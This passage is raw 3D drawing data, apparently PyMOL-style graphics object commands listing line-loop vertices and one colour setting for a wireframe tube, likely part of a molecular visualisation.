VERTEX, 15.146, 30.349, 24.742,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.495, 30.279, 24.543,
VERTEX, 15.146, 30.349, 24.742,
VERTEX, 15.206, 29.963, 25.308,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.146, 30.349, 24.742,
VERTEX, 15.206, 29.963, 25.308,
VERTEX, 14.922, 30.065, 25.396,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.206, 29.963, 25.308,
VERTEX, 14.922, 30.065, 25.396,
VERTEX, 14.902, 29.707, 26.460,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.922, 30.065, 25.396,
VERTEX, 14.902, 29.707, 26.460,
VERTEX, 14.707, 29.857, 26.384,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.902, 29.707, 26.460,
VERTEX, 14.707, 29.857, 26.384,
VERTEX, 14.762, 29.662, 27.325,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.707, 29.857, 26.384,
VERTEX, 14.762, 29.662, 27.325,
VERTEX, 14.628, 29.849, 27.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.762, 29.662, 27.325,
VERTEX, 14.628, 29.849, 27.128,
VERTEX, 14.866, 29.854, 27.395,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.628, 29.849, 27.128,
VERTEX, 14.866, 29.854, 27.395,
VERTEX, 14.731, 30.044, 27.191,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.731, 30.044, 27.191,
VERTEX, 14.539, 30.265, 26.933,
VERTEX, 14.955, 30.329, 26.537,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.539, 30.265, 26.933,
VERTEX, 14.955, 30.329, 26.537,
VERTEX, 14.699, 30.514, 26.422,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.955, 30.329, 26.537,
VERTEX, 14.699, 30.514, 26.422,
VERTEX, 15.170, 30.536, 25.549,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.699, 30.514, 26.422,
VERTEX, 15.170, 30.536, 25.549,
VERTEX, 14.825, 30.668, 25.644,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.170, 30.536, 25.549,
VERTEX, 14.825, 30.668, 25.644,
VERTEX, 15.249, 30.545, 24.805,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.825, 30.668, 25.644,
VERTEX, 15.249, 30.545, 24.805,
VERTEX, 14.841, 30.638, 25.055,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.249, 30.545, 24.805,
VERTEX, 14.841, 30.638, 25.055,
VERTEX, 15.146, 30.349, 24.742,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.841, 30.638, 25.055,
VERTEX, 15.146, 30.349, 24.742,
VERTEX, 14.739, 30.440, 24.999,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.146, 30.349, 24.742,
VERTEX, 14.739, 30.440, 24.999,
VERTEX, 14.922, 30.065, 25.396,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.739, 30.440, 24.999,
VERTEX, 14.922, 30.065, 25.396,
VERTEX, 14.578, 30.190, 25.510,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.922, 30.065, 25.396,
VERTEX, 14.578, 30.190, 25.510,
VERTEX, 14.707, 29.857, 26.384,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.578, 30.190, 25.510,
VERTEX, 14.707, 29.857, 26.384,
VERTEX, 14.453, 30.036, 26.287,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.707, 29.857, 26.384,
VERTEX, 14.453, 30.036, 26.287,
VERTEX, 14.628, 29.849, 27.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.453, 30.036, 26.287,
VERTEX, 14.628, 29.849, 27.128,
VERTEX, 14.436, 30.067, 26.877,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.628, 29.849, 27.128,
VERTEX, 14.436, 30.067, 26.877,
VERTEX, 14.731, 30.044, 27.191,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.436, 30.067, 26.877,
VERTEX, 14.731, 30.044, 27.191,
VERTEX, 14.539, 30.265, 26.933,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.539, 30.265, 26.933,
VERTEX, 14.256, 30.532, 26.598,
VERTEX, 14.699, 30.514, 26.422,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.256, 30.532, 26.598,
VERTEX, 14.699, 30.514, 26.422,
VERTEX, 14.359, 30.741, 26.274,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.699, 30.514, 26.422,
VERTEX, 14.359, 30.741, 26.274,
VERTEX, 14.825, 30.668, 25.644,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.359, 30.741, 26.274,
VERTEX, 14.825, 30.668, 25.644,
VERTEX, 14.406, 30.836, 25.769,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.825, 30.668, 25.644,
VERTEX, 14.406, 30.836, 25.769,
VERTEX, 14.841, 30.638, 25.055,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.406, 30.836, 25.769,
VERTEX, 14.841, 30.638, 25.055,
VERTEX, 14.369, 30.760, 25.379,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.841, 30.638, 25.055,
VERTEX, 14.369, 30.760, 25.379,
VERTEX, 14.739, 30.440, 24.999,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.369, 30.760, 25.379,
VERTEX, 14.739, 30.440, 24.999,
VERTEX, 14.269, 30.558, 25.332,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.739, 30.440, 24.999,
VERTEX, 14.269, 30.558, 25.332,
VERTEX, 14.578, 30.190, 25.510,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.269, 30.558, 25.332,
VERTEX, 14.578, 30.190, 25.510,
VERTEX, 14.166, 30.349, 25.656,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.578, 30.190, 25.510,
VERTEX, 14.166, 30.349, 25.656,
VERTEX, 14.453, 30.036, 26.287,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.166, 30.349, 25.656,
VERTEX, 14.453, 30.036, 26.287,
VERTEX, 14.119, 30.255, 26.161,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.453, 30.036, 26.287,
VERTEX, 14.119, 30.255, 26.161,
VERTEX, 14.436, 30.067, 26.877,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.119, 30.255, 26.161,
VERTEX, 14.436, 30.067, 26.877,
VERTEX, 14.157, 30.331, 26.551,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.436, 30.067, 26.877,
VERTEX, 14.157, 30.331, 26.551,
VERTEX, 14.539, 30.265, 26.933,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.157, 30.331, 26.551,
VERTEX, 14.539, 30.265, 26.933,
VERTEX, 14.256, 30.532, 26.598,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.256, 30.532, 26.598,
VERTEX, 13.920, 30.782, 26.259,
VERTEX, 14.359, 30.741, 26.274,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.920, 30.782, 26.259,
VERTEX, 14.359, 30.741, 26.274,
VERTEX, 13.987, 30.957, 26.126,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.359, 30.741, 26.274,
VERTEX, 13.987, 30.957, 26.126,
VERTEX, 14.406, 30.836, 25.769,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.987, 30.957, 26.126,
VERTEX, 14.406, 30.836, 25.769,
VERTEX, 13.993, 30.996, 25.900,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.406, 30.836, 25.769,
VERTEX, 13.993, 30.996, 25.900,
VERTEX, 14.369, 30.760, 25.379,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.993, 30.996, 25.900,
VERTEX, 14.369, 30.760, 25.379,
VERTEX, 13.933, 30.877, 25.713,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.369, 30.760, 25.379,
VERTEX, 13.933, 30.877, 25.713,
VERTEX, 14.269, 30.558, 25.332,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.933, 30.877, 25.713,
VERTEX, 14.269, 30.558, 25.332,
VERTEX, 13.843, 30.669, 25.675,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.269, 30.558, 25.332,
VERTEX, 13.843, 30.669, 25.675,
VERTEX, 14.166, 30.349, 25.656,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.843, 30.669, 25.675,
VERTEX, 14.166, 30.349, 25.656,
VERTEX, 13.776, 30.494, 25.808,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.166, 30.349, 25.656,
VERTEX, 13.776, 30.494, 25.808,
VERTEX, 14.119, 30.255, 26.161,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.776, 30.494, 25.808,
VERTEX, 14.119, 30.255, 26.161,
VERTEX, 13.771, 30.455, 26.034,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.119, 30.255, 26.161,
VERTEX, 13.771, 30.455, 26.034,
VERTEX, 14.157, 30.331, 26.551,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.771, 30.455, 26.034,
VERTEX, 14.157, 30.331, 26.551,
VERTEX, 13.831, 30.574, 26.221,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.157, 30.331, 26.551,
VERTEX, 13.831, 30.574, 26.221,
VERTEX, 14.256, 30.532, 26.598,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.831, 30.574, 26.221,
VERTEX, 14.256, 30.532, 26.598,
VERTEX, 13.920, 30.782, 26.259,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.920, 30.782, 26.259,
VERTEX, 13.616, 30.909, 26.263,
VERTEX, 13.987, 30.957, 26.126,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.616, 30.909, 26.263,
VERTEX, 13.987, 30.957, 26.126,
VERTEX, 13.663, 31.087, 26.126,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.987, 30.957, 26.126,
VERTEX, 13.663, 31.087, 26.126,
VERTEX, 13.993, 30.996, 25.900,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.663, 31.087, 26.126,
VERTEX, 13.993, 30.996, 25.900,
VERTEX, 13.654, 31.124, 25.899,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.993, 30.996, 25.900,
VERTEX, 13.654, 31.124, 25.899,
VERTEX, 13.933, 30.877, 25.713,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.654, 31.124, 25.899,
VERTEX, 13.933, 30.877, 25.713,
VERTEX, 13.596, 30.998, 25.716,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.933, 30.877, 25.713,
VERTEX, 13.596, 30.998, 25.716,
VERTEX, 13.843, 30.669, 25.675,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.596, 30.998, 25.716,
VERTEX, 13.843, 30.669, 25.675,
VERTEX, 13.522, 30.783, 25.684,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.843, 30.669, 25.675,
VERTEX, 13.522, 30.783, 25.684,
VERTEX, 13.776, 30.494, 25.808,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.522, 30.783, 25.684,
VERTEX, 13.776, 30.494, 25.808,
VERTEX, 13.476, 30.605, 25.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.776, 30.494, 25.808,
VERTEX, 13.476, 30.605, 25.821,
VERTEX, 13.771, 30.455, 26.034,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.476, 30.605, 25.821,
VERTEX, 13.771, 30.455, 26.034,
VERTEX, 13.484, 30.568, 26.048,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.771, 30.455, 26.034,
VERTEX, 13.484, 30.568, 26.048,
VERTEX, 13.831, 30.574, 26.221,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.484, 30.568, 26.048,
VERTEX, 13.831, 30.574, 26.221,
VERTEX, 13.542, 30.694, 26.231,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.831, 30.574, 26.221,
VERTEX, 13.542, 30.694, 26.231,
VERTEX, 13.920, 30.782, 26.259,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.542, 30.694, 26.231,
VERTEX, 13.920, 30.782, 26.259,
VERTEX, 13.616, 30.909, 26.263,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.616, 30.909, 26.263,
VERTEX, 13.362, 30.992, 26.272,
VERTEX, 13.663, 31.087, 26.126,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.362, 30.992, 26.272,
VERTEX, 13.663, 31.087, 26.126,
VERTEX, 13.389, 31.172, 26.132,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.663, 31.087, 26.126,
VERTEX, 13.389, 31.172, 26.132,
VERTEX, 13.654, 31.124, 25.899,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.389, 31.172, 26.132,
VERTEX, 13.654, 31.124, 25.899,
VERTEX, 13.369, 31.206, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.654, 31.124, 25.899,
VERTEX, 13.369, 31.206, 25.906,
VERTEX, 13.596, 30.998, 25.716,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.369, 31.206, 25.906,
VERTEX, 13.596, 30.998, 25.716,
VERTEX, 13.313, 31.075, 25.726,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.596, 30.998, 25.716,
VERTEX, 13.313, 31.075, 25.726,
VERTEX, 13.522, 30.783, 25.684,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.313, 31.075, 25.726,
VERTEX, 13.522, 30.783, 25.684,
VERTEX, 13.255, 30.855, 25.697,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.522, 30.783, 25.684,
VERTEX, 13.255, 30.855, 25.697,
VERTEX, 13.476, 30.605, 25.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.255, 30.855, 25.697,
VERTEX, 13.476, 30.605, 25.821,
VERTEX, 13.228, 30.674, 25.837,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.476, 30.605, 25.821,
VERTEX, 13.228, 30.674, 25.837,
VERTEX, 13.484, 30.568, 26.048,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.228, 30.674, 25.837,
VERTEX, 13.484, 30.568, 26.048,
VERTEX, 13.248, 30.640, 26.063,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.484, 30.568, 26.048,
VERTEX, 13.248, 30.640, 26.063,
VERTEX, 13.542, 30.694, 26.231,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.248, 30.640, 26.063,
VERTEX, 13.542, 30.694, 26.231,
VERTEX, 13.304, 30.771, 26.243,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.542, 30.694, 26.231,
VERTEX, 13.304, 30.771, 26.243,
VERTEX, 13.616, 30.909, 26.263,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.304, 30.771, 26.243,
VERTEX, 13.616, 30.909, 26.263,
VERTEX, 13.362, 30.992, 26.272,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.362, 30.992, 26.272,
VERTEX, 13.144, 31.045, 26.284,
VERTEX, 13.389, 31.172, 26.132,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.144, 31.045, 26.284,
VERTEX, 13.389, 31.172, 26.132,
VERTEX, 13.156, 31.226, 26.143,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.389, 31.172, 26.132,
VERTEX, 13.156, 31.226, 26.143,
VERTEX, 13.369, 31.206, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.156, 31.226, 26.143,
VERTEX, 13.369, 31.206, 25.906,
VERTEX, 13.125, 31.258, 25.918,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.369, 31.206, 25.906,
VERTEX, 13.125, 31.258, 25.918,
VERTEX, 13.313, 31.075, 25.726,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.125, 31.258, 25.918,
VERTEX, 13.313, 31.075, 25.726,
VERTEX, 13.070, 31.123, 25.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.313, 31.075, 25.726,
VERTEX, 13.070, 31.123, 25.740,
VERTEX, 13.255, 30.855, 25.697,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.070, 31.123, 25.740,
VERTEX, 13.255, 30.855, 25.697,
VERTEX, 13.023, 30.900, 25.714,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.255, 30.855, 25.697,
VERTEX, 13.023, 30.900, 25.714,
VERTEX, 13.228, 30.674, 25.837,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.023, 30.900, 25.714,
VERTEX, 13.228, 30.674, 25.837,
VERTEX, 13.011, 30.719, 25.855,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.228, 30.674, 25.837,
VERTEX, 13.011, 30.719, 25.855,
VERTEX, 13.248, 30.640, 26.063,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.011, 30.719, 25.855,
VERTEX, 13.248, 30.640, 26.063,
VERTEX, 13.042, 30.687, 26.081,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.248, 30.640, 26.063,
VERTEX, 13.042, 30.687, 26.081,
VERTEX, 13.304, 30.771, 26.243,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.042, 30.687, 26.081,
VERTEX, 13.304, 30.771, 26.243,
VERTEX, 13.097, 30.822, 26.258,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.304, 30.771, 26.243,
VERTEX, 13.097, 30.822, 26.258,
VERTEX, 13.362, 30.992, 26.272,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.097, 30.822, 26.258,
VERTEX, 13.362, 30.992, 26.272,
VERTEX, 13.144, 31.045, 26.284,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.144, 31.045, 26.284,
VERTEX, 12.950, 31.085, 26.298,
VERTEX, 13.156, 31.226, 26.143,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.950, 31.085, 26.298,
VERTEX, 13.156, 31.226, 26.143,
VERTEX, 12.954, 31.265, 26.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.156, 31.226, 26.143,
VERTEX, 12.954, 31.265, 26.156,
VERTEX, 13.125, 31.258, 25.918,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.954, 31.265, 26.156,
VERTEX, 13.125, 31.258, 25.918,
VERTEX, 12.913, 31.296, 25.932,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.125, 31.258, 25.918,
VERTEX, 12.913, 31.296, 25.932,
VERTEX, 13.070, 31.123, 25.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.913, 31.296, 25.932,
VERTEX, 13.070, 31.123, 25.740,
VERTEX, 12.852, 31.160, 25.758,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.070, 31.123, 25.740,
VERTEX, 12.852, 31.160, 25.758,
VERTEX, 13.023, 30.900, 25.714,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.852, 31.160, 25.758,
VERTEX, 13.023, 30.900, 25.714,
VERTEX, 12.805, 30.936, 25.735,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.023, 30.900, 25.714,
VERTEX, 12.805, 30.936, 25.735,
VERTEX, 13.011, 30.719, 25.855,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.805, 30.936, 25.735,
VERTEX, 13.011, 30.719, 25.855,
VERTEX, 12.802, 30.756, 25.878,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.011, 30.719, 25.855,
VERTEX, 12.802, 30.756, 25.878,
VERTEX, 13.042, 30.687, 26.081,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.802, 30.756, 25.878,
VERTEX, 13.042, 30.687, 26.081,
VERTEX, 12.842, 30.725, 26.102,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.042, 30.687, 26.081,
VERTEX, 12.842, 30.725, 26.102,
VERTEX, 13.097, 30.822, 26.258,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.842, 30.725, 26.102,
VERTEX, 13.097, 30.822, 26.258,
VERTEX, 12.904, 30.861, 26.276,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.097, 30.822, 26.258,
VERTEX, 12.904, 30.861, 26.276,
VERTEX, 13.144, 31.045, 26.284,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.904, 30.861, 26.276,
VERTEX, 13.144, 31.045, 26.284,
VERTEX, 12.950, 31.085, 26.298,
END,
COLOR, 0.000, 0.827, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 12.950, 31.085, 26.298,
VERTEX, 12.766, 31.127, 26.314,
VERTEX, 12.954, 31.265, 26.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.766, 31.127, 26.314,
VERTEX, 12.954, 31.265, 26.156,
VERTEX, 12.771, 31.305, 26.169,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.954, 31.265, 26.156,
VERTEX, 12.771, 31.305, 26.169,
VERTEX, 12.913, 31.296, 25.932,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.771, 31.305, 26.169,
VERTEX, 12.913, 31.296, 25.932,
VERTEX, 12.720, 31.336, 25.947,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.913, 31.296, 25.932,
VERTEX, 12.720, 31.336, 25.947,
VERTEX, 12.852, 31.160, 25.758,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.720, 31.336, 25.947,
VERTEX, 12.852, 31.160, 25.758,
VERTEX, 12.643, 31.201, 25.778,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.852, 31.160, 25.758,
VERTEX, 12.643, 31.201, 25.778,
VERTEX, 12.805, 30.936, 25.735,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.643, 31.201, 25.778,
VERTEX, 12.805, 30.936, 25.735,
VERTEX, 12.585, 30.979, 25.761,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.805, 30.936, 25.735,
VERTEX, 12.585, 30.979, 25.761,
VERTEX, 12.802, 30.756, 25.878,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.585, 30.979, 25.761,
VERTEX, 12.802, 30.756, 25.878,
VERTEX, 12.581, 30.801, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.802, 30.756, 25.878,
VERTEX, 12.581, 30.801, 25.906,
VERTEX, 12.842, 30.725, 26.102,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.581, 30.801, 25.906,
VERTEX, 12.842, 30.725, 26.102,
VERTEX, 12.632, 30.770, 26.127,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.842, 30.725, 26.102,
VERTEX, 12.632, 30.770, 26.127,
VERTEX, 12.904, 30.861, 26.276,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.632, 30.770, 26.127,
VERTEX, 12.904, 30.861, 26.276,
VERTEX, 12.708, 30.906, 26.296,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.904, 30.861, 26.276,
VERTEX, 12.708, 30.906, 26.296,
VERTEX, 12.950, 31.085, 26.298,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.708, 30.906, 26.296,
VERTEX, 12.950, 31.085, 26.298,
VERTEX, 12.766, 31.127, 26.314,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.766, 31.127, 26.314,
VERTEX, 12.573, 31.187, 26.329,
VERTEX, 12.771, 31.305, 26.169,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.573, 31.187, 26.329,
VERTEX, 12.771, 31.305, 26.169,
VERTEX, 12.584, 31.362, 26.180,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.771, 31.305, 26.169,
VERTEX, 12.584, 31.362, 26.180,
VERTEX, 12.720, 31.336, 25.947,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.584, 31.362, 26.180,
VERTEX, 12.720, 31.336, 25.947,
VERTEX, 12.522, 31.393, 25.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.720, 31.336, 25.947,
VERTEX, 12.522, 31.393, 25.961,
VERTEX, 12.643, 31.201, 25.778,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.522, 31.393, 25.961,
VERTEX, 12.643, 31.201, 25.778,
VERTEX, 12.424, 31.262, 25.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.643, 31.201, 25.778,
VERTEX, 12.424, 31.262, 25.800,
VERTEX, 12.585, 30.979, 25.761,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.424, 31.262, 25.800,
VERTEX, 12.585, 30.979, 25.761,
VERTEX, 12.348, 31.046, 25.791,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.585, 30.979, 25.761,
VERTEX, 12.348, 31.046, 25.791,
VERTEX, 12.581, 30.801, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.348, 31.046, 25.791,
VERTEX, 12.581, 30.801, 25.906,
VERTEX, 12.337, 30.871, 25.940,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.581, 30.801, 25.906,
VERTEX, 12.337, 30.871, 25.940,
VERTEX, 12.632, 30.770, 26.127,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.337, 30.871, 25.940,
VERTEX, 12.632, 30.770, 26.127,
VERTEX, 12.399, 30.840, 26.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.632, 30.770, 26.127,
VERTEX, 12.399, 30.840, 26.159,
VERTEX, 12.708, 30.906, 26.296,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.399, 30.840, 26.159,
VERTEX, 12.708, 30.906, 26.296,
VERTEX, 12.497, 30.971, 26.320,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.708, 30.906, 26.296,
VERTEX, 12.497, 30.971, 26.320,
VERTEX, 12.766, 31.127, 26.314,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.497, 30.971, 26.320,
VERTEX, 12.766, 31.127, 26.314,
VERTEX, 12.573, 31.187, 26.329,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.573, 31.187, 26.329,
VERTEX, 12.354, 31.281, 26.343,
VERTEX, 12.584, 31.362, 26.180,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.354, 31.281, 26.343,
VERTEX, 12.584, 31.362, 26.180,
VERTEX, 12.370, 31.451, 26.189,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.584, 31.362, 26.180,
VERTEX, 12.370, 31.451, 26.189,
VERTEX, 12.522, 31.393, 25.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.370, 31.451, 26.189,
VERTEX, 12.522, 31.393, 25.961,
VERTEX, 12.296, 31.484, 25.974,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.522, 31.393, 25.961,
VERTEX, 12.296, 31.484, 25.974,
VERTEX, 12.424, 31.262, 25.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.296, 31.484, 25.974,
VERTEX, 12.424, 31.262, 25.800,
VERTEX, 12.175, 31.360, 25.824,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.424, 31.262, 25.800,
VERTEX, 12.175, 31.360, 25.824,
VERTEX, 12.348, 31.046, 25.791,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.175, 31.360, 25.824,
VERTEX, 12.348, 31.046, 25.791,
VERTEX, 12.078, 31.152, 25.825,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.348, 31.046, 25.791,
VERTEX, 12.078, 31.152, 25.825,
VERTEX, 12.337, 30.871, 25.940,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.078, 31.152, 25.825,
VERTEX, 12.337, 30.871, 25.940,
VERTEX, 12.062, 30.981, 25.978,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.337, 30.871, 25.940,
VERTEX, 12.062, 30.981, 25.978,
VERTEX, 12.399, 30.840, 26.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.062, 30.981, 25.978,
VERTEX, 12.399, 30.840, 26.159,
VERTEX, 12.136, 30.949, 26.193,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.399, 30.840, 26.159,
VERTEX, 12.136, 30.949, 26.193,
VERTEX, 12.497, 30.971, 26.320,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.136, 30.949, 26.193,
VERTEX, 12.497, 30.971, 26.320,
VERTEX, 12.257, 31.073, 26.344,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.497, 30.971, 26.320,
VERTEX, 12.257, 31.073, 26.344,
VERTEX, 12.573, 31.187, 26.329,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.257, 31.073, 26.344,
VERTEX, 12.573, 31.187, 26.329,
VERTEX, 12.354, 31.281, 26.343,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.354, 31.281, 26.343,
VERTEX, 12.089, 31.425, 26.355,
VERTEX, 12.370, 31.451, 26.189,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.089, 31.425, 26.355,
VERTEX, 12.370, 31.451, 26.189,
VERTEX, 12.107, 31.591, 26.197,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.370, 31.451, 26.189,
VERTEX, 12.107, 31.591, 26.197,
VERTEX, 12.296, 31.484, 25.974,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.107, 31.591, 26.197,
VERTEX, 12.296, 31.484, 25.974,
VERTEX, 12.020, 31.627, 25.988,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.296, 31.484, 25.974,
VERTEX, 12.020, 31.627, 25.988,
VERTEX, 12.175, 31.360, 25.824,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.020, 31.627, 25.988,
VERTEX, 12.175, 31.360, 25.824,
VERTEX, 11.877, 31.511, 25.849,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.175, 31.360, 25.824,
VERTEX, 11.877, 31.511, 25.849,
VERTEX, 12.078, 31.152, 25.825,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.877, 31.511, 25.849,
VERTEX, 12.078, 31.152, 25.825,
